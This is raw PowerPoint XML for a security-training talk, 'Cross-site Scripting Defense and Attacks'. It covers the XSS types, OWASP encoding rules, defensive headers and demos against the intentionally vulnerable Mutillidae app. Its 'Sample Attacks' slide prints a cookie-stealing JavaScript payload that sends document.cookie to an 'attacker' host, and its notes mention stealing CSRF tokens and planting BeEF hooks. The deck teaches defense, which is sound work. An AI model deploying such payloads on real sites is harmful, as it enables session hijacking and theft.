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1" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId34"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId35"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="272" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="295" r:id="rId12"/>
    <p:sldId id="296" r:id="rId13"/>
    <p:sldId id="297" r:id="rId14"/>
    <p:sldId id="298" r:id="rId15"/>
    <p:sldId id="294" r:id="rId16"/>
    <p:sldId id="287" r:id="rId17"/>
    <p:sldId id="288" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="276" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="283" r:id="rId25"/>
    <p:sldId id="279" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="266" r:id="rId33"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="931386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20A35FF1-62A1-5A42-A1D2-756514C1AA1B}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Content Slides" id="{295D142A-0911-5242-8846-8B80ECDBE2F6}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="294"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="284"/>
            <p14:sldId id="276"/>
            <p14:sldId id="285"/>
            <p14:sldId id="277"/>
            <p14:sldId id="283"/>
            <p14:sldId id="279"/>
            <p14:sldId id="281"/>
            <p14:sldId id="286"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="280"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Image Slides" id="{A2565F24-7758-544D-9566-1AA2EAEF675D}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Section Divider" id="{191F3268-1E7A-384E-B46C-40D6CB17006B}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Ending Slide" id="{FD84001B-71A2-0E4B-830B-073E77A3BEA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2" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="5376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948" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="2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6273" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="132" d="100"/>
          <a:sy n="132" d="100"/>
        </p:scale>
        <p:origin x="1485" y="65"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="372"/>
        <p:guide pos="5376"/>
        <p:guide pos="408"/>
        <p:guide orient="horz" pos="948"/>
        <p:guide orient="horz" pos="27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Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}"/>
    <pc:docChg chg="custSel addSld modSld">
      <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-26T16:50:30.484" v="678" actId="6549"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-26T16:50:30.484" v="678" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2109035596" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-26T16:50:30.484" v="678" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2109035596" sldId="272"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:20:48.007" v="158" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1496190710" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add modNotesTx">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:20:38.821" v="157" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2547038633" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:20:08.047" v="106" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547038633" sldId="295"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:15:03.989" v="7" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547038633" sldId="295"/>
            <ac:spMk id="7" creationId="{0971B24E-84BD-499C-B29B-18B99E28552F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add modNotesTx">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:26:37.785" v="434" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3807245771" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:25:04.381" v="319" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3807245771" sldId="296"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add modNotesTx">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:28:06.237" v="630" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3769299300" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:28:06.237" v="630" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3769299300" sldId="297"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add modNotesTx">
        <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:31:16.939" v="677"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838799003" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{6486B060-B140-4595-A49F-27AB99C4C8C3}" dt="2018-04-25T00:31:16.939" v="677"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838799003" sldId="298"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Stephen Deck" userId="d0abce2a322c43a5" providerId="LiveId" clId="{C5CC3222-81B9-4D21-9931-C6F8CB0F040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D5D92E-EFFF-4AB9-A675-B3E00799DE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1CF29-8208-4D9E-B11A-B11AEC5D4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82BA-A40A-4637-9224-2A7877C299B9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9150F-0509-4EE5-BD71-8768B57D57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D9940-803E-44B4-89DC-E1BDCCEB2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49A6-0FDB-40E5-A21D-A7D98097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0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F0A6AF3A-C228-024A-8C2E-6E0FCC8DEC76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F54EAC9-6F55-7344-9BAC-CED3200D9C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Covering attack and defense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-Use XSS to do something useful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Stephen Deck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Appsec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consultant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-6 years in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appsec</a:t>
            </a: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-IR, Forensics, Engineering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-8 years software dev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-Infantry officer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76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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prevents JS from accessing cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSP restricts from where a browser will allow scripts on the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auto-escaping helps prevent accidentally forgetting encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-XSS-Protection re-enables default browser protections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68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Never trust clients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Normal browsers don’t show everything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Can use plugins, proxies are better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Some parameters are bad for reflection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-any examples?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--User Agent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--cookies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-still good for stored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80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Query string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-manipulated through URL bar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POST Data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-some is visible on page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All else you use a proxy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81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These are the three types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Slight variances in how they are executed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41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User makes request with the malicious script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Server sends it right back and browser executes script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Phishing links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Malicious/compromised server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Browser controls limit much of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URL-encoded “&lt;&gt;’ characters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Characters come back unencoded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If remediated they show up as &amp;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quot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;&amp;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lt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;&amp;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gt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;&amp;#x22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-lets browser know they are not markup – just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4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Server stores malicious script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-victims run it when the server sends it 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dirty="0"/>
              <a:t>Browser controls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Encoded chars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Victim views blog and runs the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9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Document Object Model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XSS resulting from DOM modification in JS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Can be reflected or stored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May not have to send data to the server to run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Describe cross-site scripting and what it means to an application. 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 few scenarios for remediating XSS from the OWASP XSS prevention sheet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Common methods for locating XSS and basic attacks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How to run interesting attacks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-better than a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messagebox</a:t>
            </a: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First, let’s talk about some tools that I will use during this presentation.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00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Looks just like reflected XSS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Injection point is in document modification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So far, attacks are kind of lame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4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Cookie theft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-Cookies track users in the application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-Can impersonate users with them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HTTPOnly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flag can help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-define an image that sends cookies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Read/mod page elements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-read the DOM and use the image tag to steal the info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-CSRF tokens prevent forced POST requests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--attackers can steal them and force POSTs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Deface site by including other content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Send victim to another web site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-Redirect off reflected XSS for phishing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--link points to the good site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Include Metasploit links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iframe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link doesn’t have to be visible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Run a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BeEF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hook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-Crafting individual attacks is a pain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-especially for complicated attacks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BeEF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can automate it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Misc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| create invisible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iframe</a:t>
            </a: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Browser | Hooked Domain | Get Cookie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Browser | Hooked Domain | Redirect Browser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Persistence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There are far too many commands to go through during a single presentation, but this at least gives an idea of what can be done with XSS.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98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6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28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0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Final take-aways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-attacks always execute on the client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-fix with proper encoding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--not always that easy to do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--can use strict whitelisting (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alphanumerics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)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More than just message boxes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Mutillidae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-Training platform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-Intentionally vulnerable web app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-has OWASP top 10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vulns</a:t>
            </a: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-difficulty levels and hints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Burp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-not too in depth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-I use it most of the time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-Other proxies like ZAP are just as good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Firefox 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-Disable security controls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-Separate proxy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-Supports plugins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BeEF</a:t>
            </a:r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-Browser Exploitation Framework project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-Uses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BeEF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hook in XSS situations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-Not used in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appsec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much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-Great for demonstration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Metasploit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-Framework with pre-built exploits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-Useful for post-exploitation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 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All tools here have a free version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Let’s move onto cross-site scripting.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Might be written as XSS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Been around since late 90s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Attacker uses site to get JavaScript to run on victim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Script should safely display as text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Incorrect encoding causes script to execute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 Regular" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How does one properly encode their output? That is a pretty complicated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8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“Properly” is the catch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8 rules – one is “only put user-controlled output in these 7 other places”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frameworks and third party systems offer encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Devs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have to use the right encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only covering 3 cases today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Element content has 6 dangerous characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most can be HTML entities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; or &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-single quote has to be &amp;#x27 or &amp;#39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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Encode WAY more characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>---Double quote not required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JS Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Safest to hex escape everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-JS is just crazy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-some functions are ALWAYS unsafe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escape everything. Same rationale as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escape everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Total control of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> isn’t safe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript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 have to allow markup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4EAC9-6F55-7344-9BAC-CED3200D9C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7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767" y="594818"/>
            <a:ext cx="7878634" cy="479769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767" y="1500127"/>
            <a:ext cx="7878634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87056"/>
            <a:ext cx="4648200" cy="36552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7097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1935507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2848286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95013"/>
            <a:ext cx="1996222" cy="6372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935507"/>
            <a:ext cx="76200" cy="11778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 rot="16200000">
            <a:off x="6590866" y="2757781"/>
            <a:ext cx="3697765" cy="19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BE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>INFORMED.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STRATEGIC.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SECURE.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17271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5"/>
            <a:ext cx="6858000" cy="600308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485140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3670662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3670662" cy="298367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9090" y="587744"/>
            <a:ext cx="6858000" cy="605179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090" y="1500524"/>
            <a:ext cx="6858000" cy="124142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79029" y="4827782"/>
            <a:ext cx="44609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Confidential. Not to be copied, distributed, or reproduced without prior approval. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158925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58" y="588557"/>
            <a:ext cx="7978741" cy="70628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649090" y="1498936"/>
            <a:ext cx="7974210" cy="2552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4880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504951"/>
            <a:ext cx="3867150" cy="288924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896" y="1504951"/>
            <a:ext cx="3867150" cy="28892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495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60" y="589610"/>
            <a:ext cx="7886700" cy="6708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3609" y="150075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609" y="2119880"/>
            <a:ext cx="3868737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2521" y="150075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521" y="2119880"/>
            <a:ext cx="3887788" cy="230528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7528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 rot="16200000">
            <a:off x="402389" y="1750261"/>
            <a:ext cx="1484397" cy="9937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/>
              <a:t>DIVIDER TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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7937" y="3062037"/>
            <a:ext cx="0" cy="208146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15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4" y="1894102"/>
            <a:ext cx="3034952" cy="9689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3079660"/>
            <a:ext cx="9143999" cy="198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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.directdefense.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="12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672" y="590549"/>
            <a:ext cx="7885728" cy="74734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97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936" y="588161"/>
            <a:ext cx="7878547" cy="653288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63" y="1499832"/>
            <a:ext cx="7885424" cy="112514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6537" y="588243"/>
            <a:ext cx="7886700" cy="727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6538" y="1507826"/>
            <a:ext cx="3868340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38" y="2125760"/>
            <a:ext cx="3868340" cy="2399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501148"/>
            <a:ext cx="388739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9082"/>
            <a:ext cx="3887391" cy="2406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504950"/>
            <a:ext cx="3409188" cy="2945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0800000" flipH="1" flipV="1">
            <a:off x="663562" y="1789352"/>
            <a:ext cx="45719" cy="235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12800" y="1789352"/>
            <a:ext cx="2336800" cy="2350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71900" y="1789352"/>
            <a:ext cx="4744641" cy="617934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3771900" y="2407286"/>
            <a:ext cx="4744641" cy="1732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428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4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1736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008127" y="1694259"/>
            <a:ext cx="2534560" cy="2128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1077318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16200000" flipH="1">
            <a:off x="3761352" y="1075338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rot="16200000" flipH="1">
            <a:off x="6445386" y="1075336"/>
            <a:ext cx="45719" cy="904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672" y="590549"/>
            <a:ext cx="7886700" cy="7473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72" y="1504950"/>
            <a:ext cx="7886700" cy="2979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7" y="4712316"/>
            <a:ext cx="199173" cy="282883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68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5" r:id="rId5"/>
    <p:sldLayoutId id="2147483685" r:id="rId6"/>
    <p:sldLayoutId id="2147483664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.AppleSystemUIFont" charset="-120"/>
        <a:buChar char="-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700" y="586607"/>
            <a:ext cx="7886700" cy="68648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46" y="1504950"/>
            <a:ext cx="7886700" cy="247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7" y="4676808"/>
            <a:ext cx="453172" cy="35017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195641" y="4780915"/>
            <a:ext cx="1876388" cy="18288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869A38CF-E133-2243-90F7-979D11E866BA}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>April 26, 2018</a:t>
            </a:fld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7" y="4783059"/>
            <a:ext cx="329636" cy="18288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999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  <p:sldLayoutId id="2147483683" r:id="rId4"/>
    <p:sldLayoutId id="2147483680" r:id="rId5"/>
    <p:sldLayoutId id="2147483673" r:id="rId6"/>
    <p:sldLayoutId id="2147483674" r:id="rId7"/>
    <p:sldLayoutId id="2147483675" r:id="rId8"/>
    <p:sldLayoutId id="2147483676" r:id="rId9"/>
    <p:sldLayoutId id="2147483678" r:id="rId10"/>
    <p:sldLayoutId id="214748368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4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20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050" kern="120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.AppleSystemUIFont" charset="-120"/>
        <a:buChar char="-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595013"/>
            <a:ext cx="1996222" cy="63729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49090" y="1885498"/>
            <a:ext cx="6858000" cy="912779"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Cross-site Scripting Defense and Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
            </a:b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49090" y="3367314"/>
            <a:ext cx="6858000" cy="287055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Stephen Deck, GSE, OSCE, CISSP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6590866" y="2757781"/>
            <a:ext cx="3697765" cy="1967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BE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>INFORMED.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STRATEGIC.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> BE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>SECURE.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157208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Defenses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310134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DOM-based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ENTIRELY DIFFERENT CHEAT SHEET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(╯°□°）╯︵ ┻━┻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https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1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6790" y="4783059"/>
            <a:ext cx="461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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183879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C3EA-2853-4A57-AE71-3E2022B5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Bonus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A3CC-CA73-4557-8154-0954120D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Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Flag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Use a Content Security Policy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Auto-escaping Templates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X-XSS-Protection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A2C9-3427-45E0-B334-0F7D0D0039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A38CF-E133-2243-90F7-979D11E866BA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E90EF-2F40-42E3-A313-A98E0352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74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Injection Points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URLs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POST parameters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Cookies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Headers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Not every injection point is useful for reflection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Burp Example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2" y="1504950"/>
            <a:ext cx="8016031" cy="2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3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Types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Reflected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Stored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DOM-based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Reflected XSS Example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Triggered with malicious </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>    links or sites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http://mutillidae/index.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>    ?page=capture-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>data.php</a:t>
            </a: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2CB6D-8872-44C6-A78B-9FA69EA3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45" y="1147431"/>
            <a:ext cx="3887055" cy="31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Reflected XSS Example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673" y="2959279"/>
            <a:ext cx="3502751" cy="720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3" y="1265786"/>
            <a:ext cx="4674890" cy="1636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58" y="3736560"/>
            <a:ext cx="4629605" cy="5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7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Stored XSS Example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Triggered by browsing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>    to vulnerable pages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http://mutillidae/index.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>  page=add-to-your-blog.php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AD871-3762-49AF-9212-B3EBD622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5" y="1277257"/>
            <a:ext cx="4261186" cy="30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6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Stored XSS Example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226" y="3834860"/>
            <a:ext cx="3375314" cy="712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3" y="1337897"/>
            <a:ext cx="3813724" cy="1269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7904" y="1471808"/>
            <a:ext cx="1634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Request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2" y="2689686"/>
            <a:ext cx="4051720" cy="10639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5649" y="3126361"/>
            <a:ext cx="1634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2789" y="4041207"/>
            <a:ext cx="1634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Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70747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DOM-based XSS Example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Similar to reflected or stored XSS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Vulnerability exists within document object model (DOM) modifications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>in scripts</a:t>
            </a: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Might be exploitable without sending data to the server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http://mutillidae/index.php?page=password-generator.php&amp;username=anonymous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What is Cross-site Scripting (XSS)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How to prevent XSS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How to find XSS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How to abuse XSS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DOM-based XSS Example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2" y="3368757"/>
            <a:ext cx="7808223" cy="1115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1815518"/>
            <a:ext cx="7711110" cy="8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9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Sample Attacks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 lnSpcReduction="10000"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Cookie Theft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new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> = 'http://attacker/?cookies=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>;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Read/Modify page elements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CSRF tokens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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
